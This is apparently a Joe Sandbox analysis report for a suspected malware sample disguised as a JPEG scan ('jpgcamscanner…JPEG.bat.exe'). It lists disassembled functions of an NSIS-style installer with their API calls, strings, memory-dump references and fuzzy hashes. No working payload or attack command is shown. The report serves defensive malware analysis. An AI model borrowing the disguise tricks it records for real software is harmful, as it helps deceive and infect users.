Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: ?A@$Call$N
API String ID: 3103080414-3705382932
Opcode ID: 073baeb7e2e56e8e61070ac22e94b8c547292f2e7e559fc5b4704c6dbdd391f8
Instruction ID: 58642e7cad261c001b024910741a92c2a1970d4d91afa6865c69404cbc82dd24
Opcode Fuzzy Hash: 073baeb7e2e56e8e61070ac22e94b8c547292f2e7e559fc5b4704c6dbdd391f8
Instruction Fuzzy Hash: F061B2B1A40209BFEB109F61DD45B6A7B69FB84715F008036FB04BA2D1C7B8A951CB99

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0195cc9bd3a679183555b6c9b2658d6023a39abd86bfcdd07458fb5c51006648
Instruction ID: d756f8073455ec7f94eaaa006bac723f94b68f9cc4de0a6a70f3062e944f429a
Opcode Fuzzy Hash: 0195cc9bd3a679183555b6c9b2658d6023a39abd86bfcdd07458fb5c51006648
Instruction Fuzzy Hash: 6E419B71804249AFCF058FA4CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5

Function 00405BD9 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405D6A,?,?), ref: 00405C0A
GetShortPathNameA.KERNEL32(?,00421A98,00000400), ref: 00405C13

Part of subcall function 00405A68: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A78
Part of subcall function 00405A68: lstrlenA.KERNEL32(00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAA

GetShortPathNameA.KERNEL32(?,00421E98,00000400), ref: 00405C30
wsprintfA.USER32 ref: 00405C4E
GetFileSize.KERNEL32(00000000,00000000,00421E98,C0000000,00000004,00421E98,?,?,?,?,?), ref: 00405C89
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C98
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CD0
SetFilePointer.KERNEL32(004093B8,00000000,00000000,00000000,00000000,00421698,00000000,-0000000A,004093B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D26
GlobalFree.KERNEL32(00000000), ref: 00405D37
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D3E

Part of subcall function 00405B03: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe,80000000,00000003), ref: 00405B07
Part of subcall function 00405B03: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B29

Strings

[Rename], xrefs: 00405CB8, 00405CCA
%s=%s, xrefs: 00405C44

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: dcec08deab34ba1dd52a754f69103c133d2ca35d1299f4207b96b8b2c06c206e
Instruction ID: 5deb0727307c374d823852481fd1d72290d2d80dc16b0ec149a77f792b4fa3ea
Opcode Fuzzy Hash: dcec08deab34ba1dd52a754f69103c133d2ca35d1299f4207b96b8b2c06c206e
Instruction Fuzzy Hash: 0F31F231605B156BD6206B659C49F6B3AACDF45754F14043BBE01FA2D2E67CAC008EBD

Function 004061D4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe",75953410,C:\Users\user\AppData\Local\Temp\,00000000,004031B1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 0040622C
CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406239
CharNextA.USER32(?,"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe",75953410,C:\Users\user\AppData\Local\Temp\,00000000,004031B1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 0040623E
CharPrevA.USER32(?,?,75953410,C:\Users\user\AppData\Local\Temp\,00000000,004031B1,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033E8,?,00000006,00000008,0000000A), ref: 0040624E

Strings

*?|<>/":, xrefs: 0040621C
"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe", xrefs: 00406210
C:\Users\user\AppData\Local\Temp\, xrefs: 004061D5

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-3597868374
Opcode ID: 7d136cfff8c7bf043451e4c65a0ab86a2e72481698e5121a5e115d190c3ec359
Instruction ID: 78b5553556e1b29770c7274e4e8764cd0b55728b37568efcb800383df96c7a9c
Opcode Fuzzy Hash: 7d136cfff8c7bf043451e4c65a0ab86a2e72481698e5121a5e115d190c3ec359
Instruction Fuzzy Hash: FF11045180839029FB3226380C40BB76F994F6A760F1900BFE8D2722C2D67C5CA2976E

Function 00404070 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 0040408D
GetSysColor.USER32(00000000), ref: 004040CB
SetTextColor.GDI32(?,00000000), ref: 004040D7
SetBkMode.GDI32(?,?), ref: 004040E3
GetSysColor.USER32(?), ref: 004040F6
SetBkColor.GDI32(?,?), ref: 00404106
DeleteObject.GDI32(?), ref: 00404120
CreateBrushIndirect.GDI32(?), ref: 0040412A

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: c86d0c104538bc307405f6e360d8371e1c040facf7e5af7d22035c6604205aa7
Instruction ID: dc807fd0e826fa60b9ec6720df696095df3ef071cd79e71149a0dd006d979902
Opcode Fuzzy Hash: c86d0c104538bc307405f6e360d8371e1c040facf7e5af7d22035c6604205aa7
Instruction Fuzzy Hash: D021B2709047059BCB309F28DC48A4BBBF8AF81715F048A2AFA96B62E0C334E844CB55

Function 6DDA249C Relevance: 10.6, APIs: 7, Instructions: 124COMMON

Download Yara Rule

APIs

Part of subcall function 6DDA1215: GlobalAlloc.KERNEL32(00000040,6DDA1233,?,6DDA12CF,-6DDA404B,6DDA11AB,-000000A0), ref: 6DDA121D

GlobalFree.KERNEL32(?), ref: 6DDA25A2
GlobalFree.KERNEL32(00000000), ref: 6DDA25DC

Memory Dump Source

Source File: 00000002.00000002.19336656011.000000006DDA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6DDA0000, based on PE: true

Associated: 00000002.00000002.19336624915.000000006DDA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.19336698506.000000006DDA3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.19336738516.000000006DDA5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6dda0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 5d431f85420ca535a957a0409eb0ee789ab8700dd98e00d1cc21a4f34618c106
Instruction ID: 411144033dbf1e48ac3033ac30a75991e3781b14fcc5b047930901420c045d65
Opcode Fuzzy Hash: 5d431f85420ca535a957a0409eb0ee789ab8700dd98e00d1cc21a4f34618c106
Instruction Fuzzy Hash: 8241BF72548212EFD725AF96CCA5D2E7FBAFB87309B0DC52DF64183140CB7198049B66

Function 0040495C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404977
GetMessagePos.USER32 ref: 0040497F
ScreenToClient.USER32(?,?), ref: 00404999
SendMessageA.USER32(?,00001111,00000000,?), ref: 004049AB
SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049D1

Strings

f, xrefs: 004049AD

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction ID: 064635845699c0f4496499246dda67b20ede28c923f9f6f9e3dc5f389f782763
Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
Instruction Fuzzy Hash: 38015271D00219BADB01DBA4DD85BFFBBBCAF55711F10412BBA10B61C0D7B469018BA5

Function 00402C7C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C97
MulDiv.KERNEL32(0005CA04,00000064,0005CA08), ref: 00402CC2
wsprintfA.USER32 ref: 00402CD2
SetWindowTextA.USER32(?,?), ref: 00402CE2
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CF4

Strings

verifying installer: %d%%, xrefs: 00402CCC

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: bae99d8ff7e2baad353350c7eaeb5d71397e6bffa89abe4dcb3f34ba705061ab
Instruction ID: 8c289f0fb36a9d27d262e5defce623c0a4e81db89a67886656150a2c4b5e1d8a
Opcode Fuzzy Hash: bae99d8ff7e2baad353350c7eaeb5d71397e6bffa89abe4dcb3f34ba705061ab
Instruction Fuzzy Hash: 00014F70944208BBEF249F60DD09EEE37A9EB04704F008039FA06B92E0D7B99955CF59

Function 6DDA22B5 Relevance: 9.1, APIs: 6, Instructions: 140memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 6DDA240B

Part of subcall function 6DDA1224: lstrcpynA.KERNEL32(00000000,?,6DDA12CF,-6DDA404B,6DDA11AB,-000000A0), ref: 6DDA1234

GlobalAlloc.KERNEL32(00000040,?), ref: 6DDA2386
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6DDA239B
GlobalAlloc.KERNEL32(00000040,00000010), ref: 6DDA23AC
CLSIDFromString.OLE32(00000000,00000000), ref: 6DDA23BA
GlobalFree.KERNEL32(00000000), ref: 6DDA23C1

Memory Dump Source

Source File: 00000002.00000002.19336656011.000000006DDA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6DDA0000, based on PE: true

Associated: 00000002.00000002.19336624915.000000006DDA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.19336698506.000000006DDA3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.19336738516.000000006DDA5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6dda0000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
String ID:
API String ID: 3730416702-0
Opcode ID: d1e6ead0ba272c5a8ade36a63fa28fec2d3474843826fcc2edfe0b4c0c8fc76a
Instruction ID: 07792d52fab7f388c29a7314919eb1eec701ac661f83a9ecf0f94b8b29637c76
Opcode Fuzzy Hash: d1e6ead0ba272c5a8ade36a63fa28fec2d3474843826fcc2edfe0b4c0c8fc76a
Instruction Fuzzy Hash: 7A41CF7144C312DFE720AF6AC840B2ABBF8FB53319F08D81EF686CA181D77494458B62

Function 0040273C Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
GlobalFree.KERNEL32(?), ref: 004027EB
GlobalFree.KERNEL32(00000000), ref: 004027FE
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402816
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 85e3ba03c3d5ae3b94549db30e13d95ff89437b516cd7b3e456af98cbec2395a
Instruction ID: 69dabb1dc5664d4cb3e0aedb1da4cd8560a2ff3041f204a353ec2f52c38cd3f1
Opcode Fuzzy Hash: 85e3ba03c3d5ae3b94549db30e13d95ff89437b516cd7b3e456af98cbec2395a
Instruction Fuzzy Hash: 7C21BF71C00128BBCF206FA5CE49D9E7A79EF04364F14423AF410762E0C7791D009FA9

Function 00404852 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(spidskaalshoved Setup: Installing,spidskaalshoved Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040476D,000000DF,00000000,00000400,?), ref: 004048F0
wsprintfA.USER32 ref: 004048F8
SetDlgItemTextA.USER32(?,spidskaalshoved Setup: Installing), ref: 0040490B

Strings

spidskaalshoved Setup: Installing, xrefs: 004048E2, 004048E7, 004048ED, 00404901
%u.%u%s%s, xrefs: 004048DA

Memory Dump Source

Source File: 00000002.00000002.19318501291.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.19318473844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318531062.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19318559025.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.19319173016.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$spidskaalshoved Setup: Installing
API String ID: 3540041739-3016917075
Opcode ID: f42a3f722567b573f866a405e81a790f5d407c7da38f0a888911ea73de824ef5
Instruction ID: 0ac14a548df83272d562d6c5522d93b353c1d491cf82d9c84c752126d1ac48ba
Opcode Fuzzy Hash: f42a3f722567b573f866a405e81a790f5d407c7da38f0a888911ea73de824ef5
Instruction Fuzzy Hash: 2A11D573A041243BDB0065A99C45EAF3288DB85374F254637FE25F71D2EA78CC1285A8

